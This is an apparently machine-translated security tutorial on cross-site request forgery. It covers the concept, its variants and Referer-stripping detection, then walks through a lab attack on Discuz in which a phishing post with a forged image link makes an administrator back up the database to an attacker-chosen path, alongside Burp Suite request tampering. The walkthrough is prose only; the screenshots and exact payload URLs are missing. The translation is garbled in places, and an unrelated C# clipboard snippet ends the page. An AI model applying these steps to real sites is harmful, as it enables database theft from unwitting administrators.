CSRF attack technology


1. Understand CSRF

“Cross site request forge”: referred to as “CSRF” for short. In the attack scenario of CSRF, the attacker will forge a request (this request is usually a link), and then deceive the target user to click. Once the user clicks the request, the whole attack is completed. Therefore, CSRF attack also becomes “one click” attack.

CSRF, also known as “cross site request attack” by Jianghu people. In short, the attacker deceives the user’s browser through some technical means to visit a previously authenticated site and run some operations (such as sending e-mail, sending messages, and even property operations (such as transfer and purchase of goods)). Because the browser has been authenticated before, the visited site will absolutely run because it is a real user operation.

Here, a vulnerability of user authentication in the web is exploited“The attacker stole your identity and sent malicious requests in your name“What CSRF can do includes:”Send email in your name; Send messages; Steal your account; Even buying goods, virtual currency transfer The problems include personal privacy disclosure and property security.

To sum up, when the programmer develops, he does not judge the token and reference of the relevant pages, so that the attacker can construct his own URL address to deceive the target user to click.

2. CSRF principle:


As can be seen from the above figure, to complete a complete CSRF attack, the user (victim) must go through two steps:

Log in to the trusted site bank website and generate cookies locally.

Visit the beauty link phishing site without logging out of the bank’s website.

3. CSRF classification:

CSRF vulnerabilities are generally divided into two types: off-site and on-site:

3.1 outside the station

CSRF off-site vulnerabilities are essentially external data submission problems in the traditional sense. Usually, programmers will consider adding watermarks to the forms of some messages or comments to prevent spam problems (here, spam can be simply understood as spam messages, spam comments, or malicious replies with off-site links). However, sometimes in order to improve the user experience, there may be no restrictions on some operations, so the attacker can predict and set the requested parameters in advance, Write a script in the off-site web page to forge a file request, or use it with the automatically submitted form to realize get and post requests. When the user clicks the link to access the off-site web page in the session state, the client is forced to initiate the request.

3.2 station

The vulnerability of CSRF station type is due to programmer abuse to some extent$_ Request class variable. In some sensitive operations (such as changing password, adding user, etc.), the user was originally required to submit a post request from the form to pass parameters to the program, but due to the use of$_ Request and other variables. In addition to receiving the parameters passed by post request, the program also supports receiving the parameters passed by get request, which will create conditions for attackers to use CSRF attack. Generally, the attacker only needs to put the predicted request parameters in a picture link of a post or message on the site, and the victim will be forced to initiate these requests after browsing such a page.

4. CSRF vulnerability detection:

Grab a normally requested packet, remove the referer field and resubmit it. If the submission is still valid, it can basically be determined that there is a CSRF vulnerability.

Taking the csrftester tool as an example, the testing principle of the CSRF vulnerability detection tool is as follows: when using csrftester for testing, we first need to capture all the links and forms we have visited in the browser, and then modify the corresponding forms and other information in csrftester to resubmit. This is equivalent to forging a client request. If the modified test request is successfully accepted by the website server, it indicates that there is a CSRF vulnerability. Of course, this tool can also be used to carry out CSRF attacks.

5. Quick repository of CSRF vulnerabilities (discuz)

5.1 log in to discuz as an administrator;


5.2 check the database backup directory of discuz website;


5.3 back up the database as an administrator




By default, it is backed up to the current directory of the website. We capture packets in burpsuite to see its request header information


Now we delete the backed up database files to simulate a user posting normally, create a test ordinary user in discuz, and visit the posting page after logging in


Starting from this step is the beginning of posting phishing attack. For example, our simulated user sends a complaint mailbox to the website administrator, and the administrator is more concerned about this kind of information. When the administrator clicks the phishing post constructed by the simulated user, the simulated user completes the phishing attack and realizes database retrieval.

In the above steps, we see that by default, the website backs up the database to the directory of C: \ phpstudy \ phptutorial \ www \ Discuz \ data. We want the website to back up the database to the directory of C: \ phpstudy \ phptutorial \ www \ Discuz \ UC_ Server \ data \ backup directory


We construct our own backup address:



Fill this address into the network picture path and upload it to the local server




Next, log in to the administrator account and click the phishing post sent by the simulated user,


The administrator user interface has received the post sent by the simulated user. Click it


In the body of the post, at this time, the phishing address has quietly entrusted the website database to the specified location. In the front, the database backup folder we set is named myself and the database is named AAAA


The above is the database folder and backup path


The above is the database name AAAA. After the above steps, the repository is successfully built, which is also one of the typical utilization methods of CSRF vulnerabilities,

The premise of the above phishing implementation is that the admin user must be connected to the server and maintain the connection with the management center. Another thing to note is that if the fishing here is not successful, there is another place that needs to be modified, because we change the database backup path to our own path. When the IP is changed, it needs to be updated in the IP cache accessed by UCenter.


6. Burpsuite change package

In addition to the above phishing attacks, we can still use burpsuite’s data to capture packets and change its backup folder name, including the phishing address constructed above, which is changed after burpsuite’s request header captures packets

6.1 after setting up the agent, access the UCenter module,


6.2 similarly, we choose database backup and BP packet capture to modify the request header


6.3 modify backdir = yourself


As shown in the figure below, you can see that your database has been backed up to the default directory


The above is a typical application of CSRF vulnerability,

7. MySQL backup database features (extra topic)

It can be observed that during MySQL database backup, the database name is followed by the serial number,


This is a rule and feature of MySQL backup. It is mainly to solve the problem of segmented compression or segmented backup when the database file is quite large, so as to reduce the processing pressure of the server and avoid the situation that some compression and decompression software cannot perform decompression because the compressed file is too large. In addition, it avoids the additional decompression cost when the decompression software decompresses large files.


Recommended Today

(C#) Listening to the clipboard

public partial class Form1 : Form { public Form1() { InitializeComponent(); AddClipboardFormatListener(this.Handle); } protected override void WndProc(ref Message m) { if (m.Msg == WM_CLIPBOARDUPDATE) { Console.WriteLine("Clipboard content changed"); } base.WndProc(ref m); } //——————— public const int WM_CLIPBOARDUPDATE = 0x031D; [DllImport(“user32.dll”, SetLastError = true)] public static extern bool AddClipboardFormatListener(IntPtr hWnd); [DllImport(“user32.dll”, SetLastError = true)] public static […]